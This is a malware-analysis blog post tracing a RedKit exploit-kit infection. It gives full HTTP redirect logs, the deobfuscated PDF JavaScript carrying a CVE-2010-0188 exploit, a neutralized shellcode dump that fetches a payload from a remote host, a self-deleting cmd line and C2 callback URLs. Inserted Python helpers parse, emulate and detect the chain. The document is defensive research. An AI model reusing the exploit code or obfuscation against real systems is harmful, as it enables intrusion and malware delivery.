Saturday, January 12, 2013

Once upon a time with another Red Kit infection & its Payload

I was eager to see another Exploit Kit infection in action in this Crusade. Some effort was made, but I kept bumping into other non-EK infectors here and there before finally finding the infector URL below. I was really hoping this would be a Cool Exploit Kit, but it ended up being a RedKit pack.
supportservice060.ru/flow2.php
(Thanks to @MalwareSigs for the tip.) That's how the adventure began, and it went to the landing page below:

*) For reference, here's our previous Red Kit analysis -->>[HERE]
OK. Here's the story:
First of all, the route of this case's infection scheme is as follows:
Infector Page (flow2.php) 91.243.115.140 supportservice078.ru
Infector "Ticket" confirmator (/vd/5;b068d006acd6b9e6e371e501d35be2a7) 46.166.169.238 gzqxj.portrelay.com
TDS Redirector page (/tds/in.cgi?9) 91.243.115.140 supportservice078.ru
RedKit Redirector & Landing pages (hiqy.html) 81.169.145.163 schloss-beratung.de // 302 to other landing page
74.53.109.128 windermerecottage.co.uk // the landing page + payload
*) PS: Better watch the IPs, domains & DNS used by this↑ infector scheme!
Unlike Blackhole, Red Kit uses a proper confirmation scheme and a TDS redirector for every access that arrives. The infector page, the ticket confirmator and the TDS form a set of barricades. Behind those, the Red Kit hosts look like they can be set up to forward the infection from one host to another in a round-robin scheme via HTTP 302 redirects. Let's look carefully at the following log detail as PoC. We access the infector URL:
--02:24:22--  h00p://supportservice060.ru/flow2.php
Resolving supportservice060.ru... seconds 0.00, 91.243.115.140
Caching supportservice060.ru => 91.243.115.140
Connecting to supportservice060.ru|91.243.115.140|:80... seconds 0.00, connected.
  :
GET /flow2.php HTTP/1.0
Accept: */*
Host: supportservice060.ru
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 13:27:04 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 91
Connection: close
Content-Type: text/html; charset=UTF-8
  :
200 OK
Length: 91 [text/html]
02:24:25 (1.55 MB/s) - `flow2.php' saved [91/91]
Its content is:
<iframe src="h00p://supportservice078.ru/tds/in.cgi?default" height="3" width="3">
So we fetched it further; it turned out to be a long way to go before getting to the downloads..
--02:27:23--  h00p://supportservice078.ru/tds/in.cgi?default
Resolving supportservice078.ru... seconds 0.00, 91.243.115.140
Caching supportservice078.ru => 91.243.115.140
Connecting to supportservice078.ru|91.243.115.140|:80... seconds 0.00, connected.
  :
GET /tds/in.cgi?default HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
Host: supportservice078.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
  :
HTTP/1.1 302 Found
Date: Fri, 11 Jan 2013 13:30:02 GMT
Server: Apache/2.2.15 (CentOS)
Location: h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7
  :
302 Found
Location: h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7 [following]

--02:27:24--  h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7
           => `5'
Resolving gzqxj.portrelay.com... seconds 0.00, 46.166.169.238
Caching gzqxj.portrelay.com => 46.166.169.238
Connecting to gzqxj.portrelay.com|46.166.169.238|:80... seconds 0.00, connected.
  :
GET /vd/5;b068d006acd6b9e6e371e501d35be2a7 HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: gzqxj.portrelay.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
  :
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 11 Jan 2013 19:29:36 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.20
Location: h00p://supportservice078.ru/tds/in.cgi?9
Vary: Accept-Encoding,User-Agent
  :
302 Found
Location: h00p://supportservice078.ru/tds/in.cgi?9 [following]
Skipping 0 bytes of body: [] done.
--02:27:25--  h00p://supportservice078.ru/tds/in.cgi?9
           => `in.cgi@9'
conaddr is: 46.166.169.238
Found supportservice078.ru in host_name_addresses_map (003D52C8)
Connecting to supportservice078.ru|91.243.115.140|:80... seconds 0.00, connected.
  :
GET /tds/in.cgi?9 HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: supportservice078.ru
Connection: Keep-Alive
Cookie: TSUSER=vdelecc; vbpnx10=_1_; vbpnxdefault=_10_; vbpnxvdelecc=_1_
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 302 Found
Date: Fri, 11 Jan 2013 13:30:03 GMT
Server: Apache/2.2.15 (CentOS)
Location: h00p://schloss-beratung.de/hiqy.html
  :
302 Found
Location: h00p://schloss-beratung.de/hiqy.html [following]
  :
--02:27:25--  h00p://schloss-beratung.de/hiqy.html
           => `hiqy.html'
conaddr is: 46.166.169.238
Resolving schloss-beratung.de... seconds 0.00, 81.169.145.163
Caching schloss-beratung.de => 81.169.145.163
Found schloss-beratung.de in host_name_addresses_map (003D6640)
Connecting to schloss-beratung.de|81.169.145.163|:80... seconds 0.00, connected.
  :
GET /hiqy.html HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: schloss-beratung.de
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 302 Moved Temporarily
Date: Fri, 11 Jan 2013 17:27:18 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8r
X-Powered-By: PHP/5.2.17
Set-Cookie: d3e4aec0be51dc536dfa324cc2df3903=1927452e1f33f00606657af59fa38408; expires=Fri, 18-Jan-2013 17:27:18 GMT; path=/
Location: h00p://windermerecottage.co.uk/hiqy.htm
Connection: close
Content-Type: text/html
  :
302 Moved Temporarily
Location: h00p://windermerecottage.co.uk/hiqy.htm [following]

--02:27:26--  h00p://windermerecottage.co.uk/hiqy.htm
           => `hiqy.htm'
conaddr is: 46.166.169.238
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Found windermerecottage.co.uk in host_name_addresses_map (003D6B10)
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
  :
GET /hiqy.htm HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: windermerecottage.co.uk
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:27:18 GMT
Server: Apache
Content-Length: 13283
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
  :
200 OK
Length: 13,283 (13K) [text/html]
02:27:27 (2.93 MB/s) - `hiqy.htm' saved [13283/13283]
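To make the barricade chain above easier to audit, here is an added helper (not part of the original post or of any RedKit tooling) that parses wget-style output like the log above into hops, checks that every 302 Location is exactly the URL fetched next, and reports which host the chain bounces back through (the TDS). The sample log is a constructed excerpt that reproduces the five hops shown above; "h00p" is the defanged scheme used in this post.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed excerpt in the post's wget log format (h00p = defanged http), reproducing the five hops above.
SAMPLE_LOG = """\
--02:27:23--  h00p://supportservice078.ru/tds/in.cgi?default
Resolving supportservice078.ru... seconds 0.00, 91.243.115.140
HTTP/1.1 302 Found
Location: h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7
--02:27:24--  h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7
Resolving gzqxj.portrelay.com... seconds 0.00, 46.166.169.238
HTTP/1.1 302 Found
Location: h00p://supportservice078.ru/tds/in.cgi?9
--02:27:25--  h00p://supportservice078.ru/tds/in.cgi?9
Connecting to supportservice078.ru|91.243.115.140|:80... seconds 0.00, connected.
HTTP/1.1 302 Found
Location: h00p://schloss-beratung.de/hiqy.html
--02:27:25--  h00p://schloss-beratung.de/hiqy.html
Resolving schloss-beratung.de... seconds 0.00, 81.169.145.163
HTTP/1.1 302 Moved Temporarily
Location: h00p://windermerecottage.co.uk/hiqy.htm
--02:27:26--  h00p://windermerecottage.co.uk/hiqy.htm
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
HTTP/1.1 200 OK
"""

HOP_RE = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")
RESOLVE_RE = re.compile(r"^Resolving (\S+?)\.\.\. .*?(\d{1,3}(?:\.\d{1,3}){3})")
CONNECT_RE = re.compile(r"^Connecting to (\S+?)\|(\d{1,3}(?:\.\d{1,3}){3})\|")
STATUS_RE = re.compile(r"^HTTP/1\.[01] (\d{3})")
LOCATION_RE = re.compile(r"^Location: (\S+)")
@dataclass
class Hop:
    url: str
    host: str
    ip: Optional[str] = None
    status: Optional[int] = None
    location: Optional[str] = None  # first Location: header seen for this hop

def parse_chain(log: str) -> List[Hop]:
    """One Hop per '--hh:mm:ss--  url' record; the IP comes from a Resolving or Connecting line."""
    hops: List[Hop] = []
    for line in log.splitlines():
        if m := HOP_RE.match(line):
            url = m.group(1)
            hops.append(Hop(url, re.sub(r"^\w+://", "", url).split("/")[0]))
        elif not hops:
            continue
        elif (m := RESOLVE_RE.match(line) or CONNECT_RE.match(line)) and hops[-1].ip is None:
            hops[-1].ip = m.group(2)
        elif (m := STATUS_RE.match(line)) and hops[-1].status is None:
            hops[-1].status = int(m.group(1))
        elif (m := LOCATION_RE.match(line)) and hops[-1].location is None:
            hops[-1].location = m.group(1)
    return hops

def chain_is_linked(hops: List[Hop]) -> bool:
    """True when each redirect's Location is exactly the URL fetched next."""
    return all(a.location == b.url for a, b in zip(hops, hops[1:]))

def revisited_hosts(hops: List[Hop]) -> List[str]:
    """Hosts hit more than once: the TDS the chain bounces back through."""
    counts: Dict[str, int] = {}
    for h in hops:
        counts[h.host] = counts.get(h.host, 0) + 1
    return [host for host, n in counts.items() if n > 1]
```

Feeding a real capture through parse_chain gives the host/IP pairs to watch and shows at a glance where the ticket check sends the visitor back into the TDS.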
This hiqy.htm is the landing page script, with 2 jars + 1 PDF infector. To get to hiqy.htm, we must first get through the gate at↓
supportservice078.ru/tds/in.cgi?9
↑whose script, together with the access parameter we used, decides which infector we will be forwarded to. The landing page source: you'll see the neutralized landing page code here -->>[PASTEBIN] For analysis, I break down the code here -->>[PASTEBIN] The landing page has the jar download URLs below:
windermerecottage.co.uk/332.jar
windermerecottage.co.uk/887.jar
but I couldn't grab them; I got a 404. Log:
GET /332.jar HTTP/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...
HTTP/1.1 404 Not Found
Date: Fri, 11 Jan 2013 17:45:57 GMT
There's a RedKit reference ->>[HERE] that explains how to fetch the jars by direct link to the 33.html and 41.html URLs the jars download from, but this didn't work well and returned a zero-byte file; I guess the params are unmatched. PoC:
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
GET /62.html HTTP/1.0
Referer: h00p://windermerecottage.co.uk/hiqy.htm
User-Agent: MalwareMustDie
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2013 08:34:35 GMT
Server: Apache
Content-Length: 0
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 0 [text/html]
17:34:44 (0.00 B/s) - `62.html' saved [0/0]
BUT! There's also a PDF URL, which I just downloaded right away :-)
--02:47:09--  h00p://windermerecottage.co.uk/987.pdf
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
GET /987.pdf HTTP/1.0
Referer: h00p://windermerecottage.co.uk/hiqy.htm
User-Agent: MalwareMustDie is Sleepy
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:47:01 GMT
Server: Apache
Content-Disposition: inline; filename=5c6bcd22.pdf
Content-Length: 6418
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/pdf
200 OK
Length: 6,418 (6.3K) [application/pdf]
02:47:10 (126.64 MB/s) - `987.pdf' saved [6418/6418]
There is JavaScript like the below in the PDF at 0xB1D-0x185C:
drols1 = event;
gerpsoi=  "/*dbgbgfgd dswd*/CHoedsp0DCHoedsp0ACHoedsp76CHoe
edsp3BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp61CHoedsp72CHoedsp2
20CHoedsp5FCHoedsp6BCHoedsp5FCHoedsp6DCHoedsp28CHoedsp29CHo
oedsp71CHoedsp56CHoedsp29CHoedsp0DCHoedsp0ACHoedsp7BCHoedsp
p71CHoedsp56CHoedsp29CHoedsp3BCHoedsp0DCHoedsp0ACHoedsp72CH
Hoedsp7BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp61CHoedsp72CHoeds
sp3BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp65CHoedsp72CHoedsp20C
CHoedsp6ECHoedsp67CHoedsp74CHoedsp68CHoedsp20CHoedsp3CCHoed
dsp28CHoedsp76CHoedsp65CHoedsp72CHoedsp2CCHoedsp20CHoedsp31
2CHoedsp6CCHoedsp6FCHoedsp63CHoedsp6BCHoedsp28CHoedsp78CHoe
edsp20CHoedsp32CHoedsp20CHoedsp3CCHoedsp20CHoedsp6CCHoedsp6
   :
   :
..Hoedsp7DCHoedsp0DCHoedsp0A";

drols=drols1.target.creator;            // the PDF /Creator metadata field carries the script text
function tplax(search, replace, subject) {
  return subject.split(search).join(replace);   // replace-all helper
}
function botoe(frodola,fiiio) {
  valueOf[cmfi](frodola);                // cmfi is built from the /Author field (see below)
  valueOf[cmfi](Midias);                 // Midias is defined in the elided part of the script
}
var dsprpa = "i%ppd";
var cmfi = "e"+ drols1.target.author.toLowerCase().split("").reverse().join("");  // "e" + reversed /Author
ery= tplax("Anila/VCa;",'',drols);       // strip the junk token out of the /Creator text
botoe(ery,12);
var xchdfjh;
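The script above never carries its payload as plain JavaScript: one layer lives in the PDF /Creator metadata with a junk token sprinkled in, another is a hex stream separated by the token "CHoedsp", and the function name itself is built by reversing the /Author field. The helper below is an added example (not the post's code) that emulates those layers statically instead of running them; the sample /Author and /Creator values are constructed, and it assumes the real /Author reverses to "lav" so that cmfi becomes "eval", which the post implies but does not state.

```python
import re

# Constructed sample values modelled on the script above (not the real PDF's metadata).
DELIM = "CHoedsp"        # separator between hex byte values in the gerpsoi string
JUNK = "Anila/VCa;"      # token that tplax() strips out of event.target.creator
# The first bytes of the post's gerpsoi string: 0D 0A 76 61 72 20 -> "\r\nvar "
SAMPLE_HEX = "/*dbgbgfgd dswd*/CHoedsp0DCHoedsp0ACHoedsp76CHoedsp61CHoedsp72CHoedsp20"
SAMPLE_CREATOR = "var Anila/VCa;k = 1;\r\nAnila/VCa;app.alert(Anila/VCa;k);"   # constructed /Creator
SAMPLE_AUTHOR = "LAV"                                                        # constructed /Author

def hex_delimited_decode(blob: str, delim: str = DELIM) -> str:
    """Read a delim-separated hex stream back into text; non-hex chunks (the comment prefix) are dropped."""
    return "".join(chr(int(c, 16)) for c in blob.split(delim) if re.fullmatch(r"[0-9A-Fa-f]{2}", c))

def tplax(search: str, replace: str, subject: str) -> str:
    """Static mirror of the script's tplax(): subject.split(search).join(replace)."""
    return replace.join(subject.split(search))

def resolve_call_name(author: str) -> str:
    """cmfi = "e" + author.toLowerCase().split("").reverse().join(""), computed without running it."""
    return "e" + author.lower()[::-1]

def analyze(author: str, creator: str, hex_blob: str) -> dict:
    """Emulate the deobfuscation layers and report what would reach valueOf[cmfi], plus triage flags."""
    call = resolve_call_name(author)
    stage1 = tplax(JUNK, "", creator)             # ery = tplax("Anila/VCa;", '', drols)
    stage2 = hex_delimited_decode(hex_blob)       # the CHoedsp-separated hex stream, decoded
    flags = []
    if call == "eval":
        flags.append("author-reverses-to-eval")
    if JUNK in creator:
        flags.append("junk-token-in-creator")
    if re.search(r"\b(app\.alert|util\.printf|unescape|eval)\b", stage1 + stage2):
        flags.append("js-api-in-metadata")
    return {"call": call, "stage1": stage1, "stage2": stage2, "flags": flags}
```

Run against the /Author and /Creator strings pulled from a suspect PDF with a metadata dumper, the flags list is a cheap triage signal before any dynamic analysis.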
The PDF's evil JavaScript source: here's the evil code (neutralized) -->>[PASTEBIN] I used this code to get the payload by simply simulating it ->>[PASTEBIN] There's a CVE-2010-0188 exploit in the decoded code, used for the shellcode execution, with the structure below:
splaui();
function splaui(){
  var ver = get_ver();
  if (ver >= 0x1f40){          // Exploit CVE-2010-0188
    var tiff = 'SUkqADggAABB';  // LibTiff Integer aimed for overflow
    var nops = make_str('QUFB', 0x2ae8);
    var start = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    var foot = '';
    var sc_hex = '';
    if (ver < 0x2009){  // determining Adobe version before exploit..
      foot = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
      sc_hex = '4c206..000'; //Shellcode
    }
    else { foot = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
           sc_hex = '4c206..000';} //Shellcode
    if (foot.length){
      var ret = [tiff, nops, start, foot].join('');
      var sc_str = hex2str(sc_hex);
      var scode = str2uni(sc_str);
      heap_spray3(scode);
      rVBGo.rawValue = ret; }}}
And the shellcode is the below neutralized code:
4c 2O 6O Of O5 17 8O 4a  3c 2O 6O Of Of 63 8O 4a   L.`....J<.`..c.J
a3 eb 8O 4a 3O 2O 82 4a  6e 2f 8O 4a 41 41 41 41   ...JO..Jn/.JAAAA
26 OO OO OO OO OO OO OO  OO OO OO OO OO OO OO OO   &...............
12 39 8O 4a 64 2O 6O Of  OO O4 OO OO 41 41 41 41   .9.Jd.`.....AAAA
41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33   AAAAf......u4._3
cO 64 8b 4O 3O 8b 4O Oc  8b 7O 1c 56 8b 76 O8 33   .d.@O.@..p.V.v.3
db 66 8b 5e 3c O3 74 33  2c 81 ee 15 1O ff ff b8   .f.^<.t3,.......
8b 4O 3O c3 46 39 O6 75  fb 87 34 24 85 e4 75 51   .@O.F9.u..4$..uQ
e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 O3 f5 56 8b   ..LQV.u<.t5x..V.
76 2O O3 f5 33 c9 49 41  fc ad O3 c5 33 db Of be   v...3.IA....3...
             < C U T >
44 24 O8 2O 2d 73 2O 53  68 f8 OO OO OO ff 56 Oc   D$..-s.Sh.....V.
8b e8 33 c9 51 c7 44 1d  OO 77 7O 62 74 c7 44 1d   ..3.Q.D..wpbt.D.
O5 2e 64 6c 6c c6 44 1d  O9 OO 59 8a c1 O4 3O 88   ..dll.D...Y...O.
44 1d O4 41 51 6a OO 6a  OO 53 57 6a OO ff 56 14   D..AQj.j.SWj..V.
85 cO 75 16 6a OO 53 ff  56 O4 6a OO 83 eb Oc 53   ..u.j.S.V.j....S
ff 56 O4 83 c3 Oc eb O2  eb 13 47 8O 3f OO 75 fa   .V........G.?.u.
47 8O 3f OO 75 c4 6a OO  6a fe ff 56 O8 e8 9c fe   G.?.u.j.j..V....
ff ff 8e 4e Oe ec 98 fe  8a Oe 89 6f O1 bd 33 ca   ...N.......o..3.
8a 5b 1b c6 46 79 36 1a  2f 7O 68 74 74 7O 3a 2f   .[..Fy6./phttp:/
2f 77 69 6e 64 65 72 6d  65 72 65 63 6f 74 74 61   /windermerecotta
67 65 2e 63 6f 2e 75 6b  2f 36 32 2e 68 74 6d 6c   ge.co.uk/62.html
OO OO                                              ..
And you can see the un-obfuscated URL for the payload at the end of the shellcode:
h00p://windermerecottage.co.uk/62.html
If you fetch it, you'll get the malware binary setup.exe:
GET /62.html HTTP/1.0
Host: windermerecottage.co.uk
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:58:41 GMT
Server: Apache
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe <====
Content-Length: 42496
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/octet-stream
200 OK
Length: 42,496 (42K) [application/octet-stream]
02:58:51 (128.68 KB/s) - `62.html' saved [42496/42496]
Looks like this:
Sections:
   .code  0x1000 0x21f0  8704
   .text  0x4000 0x41b4 16896
   .rdata 0x9000 0x13c    512
   .data  0xa000 0xd04   2560
   .rsrc  0xb000 0x319c 12800

Compilation timedatestamp.....: 2013-01-11 15:44:17
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001000
packer: PureBasic 4.x -> Neil Hodgson - additionalPureBasic 4.x -> Neil Hodgson

After unpacking the binary, I found the CMD command below:
cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del %s
↑used for self-deletion. The complete strings are here -->>[PASTEBIN] If we execute this malware, we'll see setup.exe inject itself into a process: And it started making DNS calls to the hosts below:
cash.taxi-soyuz.ru IN A +
orderindiantoronto.com IN A +
craportuense.com IN A +
stevenyang.ca IN A +
goediving.com IN A +
triathlonclub.sakura.ne.jp IN A +
ouedknouz.com IN A +
basement-gallery.com IN A +
boersenkeller-frankfurt.de IN A +
ex9.com.br IN A +
You can see the snapshot of the process's network activity: With more detailed PoC in Wireshark: And it starts making HTTP GET requests to the URLs below:
h00p://basement-gallery.com/h.htm
h00p://craportuense.com/i.htm
h00p://ouedknouz.com/c.htm
h00p://stevenyang.ca/p.htm
h00p://orderindiantoronto.com/k.htm
h00p://goediving.com/g.htm
h00p://ex9.com.br/t.htm
h00p://boersenkeller-frankfurt.de/w.htm
h00p://cash.taxi-soyuz.ru/l.htm
h00p://triathlonclub.sakura.ne.jp/o.htm
PoC: Actually these requests were very rapid. In 3 minutes there were 16,000+ requests: Not all the requests succeeded in reaching the mothership, PoC:
--04:07:17--  h00p://triathlonclub.sakura.ne.jp/o.htm
Resolving triathlonclub.sakura.ne.jp... 59.106.27.164
Connecting to triathlonclub.sakura.ne.jp|59.106.27.164|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:07:18 ERROR 404: Not Found.

--04:07:57--  h00p://boersenkeller-frankfurt.de/w.htm
Resolving boersenkeller-frankfurt.de... 81.28.232.71
Connecting to boersenkeller-frankfurt.de|81.28.232.71|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:07:59 ERROR 404: Not Found.

--04:08:43--  h00p://orderindiantoronto.com/k.htm
Resolving orderindiantoronto.com... 174.132.192.130
Connecting to orderindiantoronto.com|174.132.192.130|:80... connected.
HTTP request sent, awaiting response... 500 Internal Server Error
04:08:44 ERROR 500: Internal Server Error.

--04:09:17--  h00p://ex9.com.br/t.htm
Resolving ex9.com.br... 200.98.246.160
Connecting to ex9.com.br|200.98.246.160|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:09:19 (0.00 B/s) - `t.htm' saved [0/0]

--04:09:44--  h00p://stevenyang.ca/p.htm
Resolving stevenyang.ca... 216.187.92.109
Connecting to stevenyang.ca|216.187.92.109|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:09:45 ERROR 404: Not Found.

--04:10:11--  h00p://cash.taxi-soyuz.ru/l.htm
Resolving cash.taxi-soyuz.ru... 217.16.21.192
Connecting to cash.taxi-soyuz.ru|217.16.21.192|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:10:12 ERROR 404: Not Found.

--04:11:05--  h00p://ouedknouz.com/c.htm
Resolving ouedknouz.com... 213.186.33.3
Connecting to ouedknouz.com|213.186.33.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:11:06 (0.00 B/s) - `c.htm' saved [0/0]

--04:11:30--  h00p://goediving.com/g.htm
Resolving goediving.com... 72.167.232.31
Connecting to goediving.com|72.167.232.31|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:11:31 (0.00 B/s) - `g.htm' saved [0/0]

--04:12:23--  h00p://craportuense.com/i.htm
Resolving craportuense.com... 94.127.190.21
Connecting to craportuense.com|94.127.190.21|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:12:25 (0.00 B/s) - `i.htm' saved [0/0]

--04:12:49--  h00p://cash.taxi-soyuz.ru/l.htm
Resolving cash.taxi-soyuz.ru... 217.16.21.192
Connecting to cash.taxi-soyuz.ru|217.16.21.192|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:12:49 ERROR 404: Not Found.
↑these domains serving the htm files are actually compromised servers with the RedKit responder implemented on them. Additionally, all of the requests use the fake user agent below:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
↑This is important for the compromised servers above when checking their access logs. BTW, one of the callback hosts has exceeded its HTTP traffic quota ;-)) We can't see significant registry changes or other dropped files beyond the operations mentioned above. Furthermore, the malware process suddenly stops/exits without errors. The previous case [HERE] also showed the same payload at the first infection. So it is in the nature of the RedKit pack to download more malware via the first payload. But this time all callback hosts look unavailable to serve :-) I still wonder WHAT IF the callbacks successfully returned a response.. VirusTotal checks currently show only 5 antivirus engines initially detecting this first payload as malware:
SHA1: 7672f68845b3e43be76eb21559ae0f8e02407e6f
MD5: 92899c20da4d9db5627af89998aadc58
File size: 41.5 KB ( 42496 bytes )
File name: setup.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 5 / 46
Analysis date: 2013-01-11 19:15:32 UTC ( 2 hours, 48 minutes ago )
URL --->>[VirusTotal]
Malware Names:
Fortinet : W32/Zbot.ANM!tr
Malwarebytes : Trojan.Bublik
ByteHero : Virus.Win32.Heur.c
Kaspersky : UDS:DangerousObject.Multi.Generic
Ikarus : Trojan-Downloader.Win32.Karagany
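For the admins of the compromised callback hosts mentioned above, here is an added example (not from the post) of the access-log check it recommends: it parses Apache combined-format lines, keeps only single-letter .htm requests sent with the fake user agent quoted above, and reports per client IP how many hits arrived and at what rate, since the post observed 16,000+ requests in 3 minutes. The log lines are constructed; the client IPs, paths and timestamps are not from any real server.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

FAKE_UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)"  # UA quoted in the post
CALLBACK_PATH = re.compile(r"^/[a-z]\.htm$")                                    # h.htm, i.htm, c.htm ...
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed Apache combined-format lines: four callback hits from one client within 30 s,
# a lone hit from another client, and one ordinary browser request that must not be flagged.
SAMPLE_LINES = [
    '10.0.0.5 - - [11/Jan/2013:17:58:41 +0000] "GET /h.htm HTTP/1.1" 404 209 "-" "' + FAKE_UA + '"',
    '10.0.0.5 - - [11/Jan/2013:17:58:50 +0000] "GET /h.htm HTTP/1.1" 404 209 "-" "' + FAKE_UA + '"',
    '10.0.0.5 - - [11/Jan/2013:17:59:01 +0000] "GET /h.htm HTTP/1.1" 404 209 "-" "' + FAKE_UA + '"',
    '10.0.0.5 - - [11/Jan/2013:17:59:11 +0000] "GET /h.htm HTTP/1.1" 200 0 "-" "' + FAKE_UA + '"',
    '10.0.0.9 - - [11/Jan/2013:17:59:30 +0000] "GET /h.htm HTTP/1.1" 404 209 "-" "' + FAKE_UA + '"',
    '10.0.0.7 - - [11/Jan/2013:17:59:40 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"',
]

def find_callback_clients(lines: List[str], min_hits: int = 3) -> Dict[str, dict]:
    """Per client IP: number of single-letter .htm requests sent with the fake UA, and their rate."""
    times: Dict[str, List[datetime]] = defaultdict(list)
    for line in lines:
        m = COMBINED.match(line)
        if not m or m["ua"] != FAKE_UA or not CALLBACK_PATH.match(m["path"]):
            continue   # malformed line, another UA, or a normal page: not a callback
        times[m["ip"]].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
    report = {}
    for ip, ts in times.items():
        if len(ts) < min_hits:
            continue   # below threshold; raise min_hits on busy servers
        span = (max(ts) - min(ts)).total_seconds()
        report[ip] = {"hits": len(ts), "per_minute": round(len(ts) * 60 / max(span, 1.0), 1)}
    return report
```

Clients that show up here are infected machines polling the responder, which is also the list a compromised site owner would want to hand to the relevant abuse contacts.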
